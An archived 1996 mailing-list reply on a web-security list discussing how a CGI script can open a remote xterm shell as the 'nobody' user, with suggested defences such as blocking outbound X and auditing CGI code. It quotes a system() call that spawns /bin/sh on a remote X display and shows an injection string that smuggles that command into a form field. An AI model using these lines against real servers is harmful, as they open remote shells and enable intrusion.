[3672] in WWW Security List Archive
Re: Hole: nobody shell
daemon@ATHENA.MIT.EDU (John Stewart)
Tue Dec 3 20:17:30 1996
To: Andrea Di Fabio <fabio@cs.odu.edu>
cc: www-security@ns2.rutgers.edu
In-reply-to: Your message of "Tue, 03 Dec 1996 11:46:21 EST."
<Pine.3.91.961203114100.25652A-100000@pitfall.cs.odu.edu>
Date: Tue, 03 Dec 1996 14:56:48 -0800
From: John Stewart <jns@cisco.com>
Errors-To: owner-www-security@ns2.rutgers.edu
->
-> I was experimenting with cgi scripts when I came up with this idea:
->
-> What if I have a cgi script which does the followin:
-> system("/usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&")
->
-> I can now pop an exterm on my display as nobody.
-> This way any user can gain access to the nobody account and
-> have fun with it...
->
-> Has this been discussed anywhere?
-> Is there a fix out there?
Other than checking which CGI programs are written onto your server?
My thoughts:
1. Block outbound X; clearly not for everybody and really only stops
one port (which can be worked around)
2. Don't have X/Openwindows/HPVue software on your Web server. We've
done that here for this very reason.
3. Audit.
The thing is, with poorly written CGI programs, you could send:
John Stewart; /usr/local/X11R6/bin/xterm -display myhost:0.0 -e /bin/sh&"
and have the same affect. It comes down to programming...
--john
John Stewart (jns@cisco.com) | | Phone: +1.408.526.8499
Advanced Customer Systems ||| ||| FAX: +1.408.232.2399
Cisco Systems, Inc. .:|||||:..:|||||:. http://www.employees.org/~jns
Friends of Randal Schwartz: http://www.lightlink.com/fors/
